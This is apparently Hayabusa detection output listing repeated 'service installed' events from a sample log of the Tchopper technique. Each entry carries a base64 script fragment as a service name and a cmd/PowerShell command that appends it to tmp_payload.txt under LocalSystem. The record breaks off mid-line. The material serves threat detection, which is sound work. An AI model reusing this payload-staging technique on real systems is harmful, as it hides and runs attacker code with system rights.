17:19:10.406 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:26.591 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 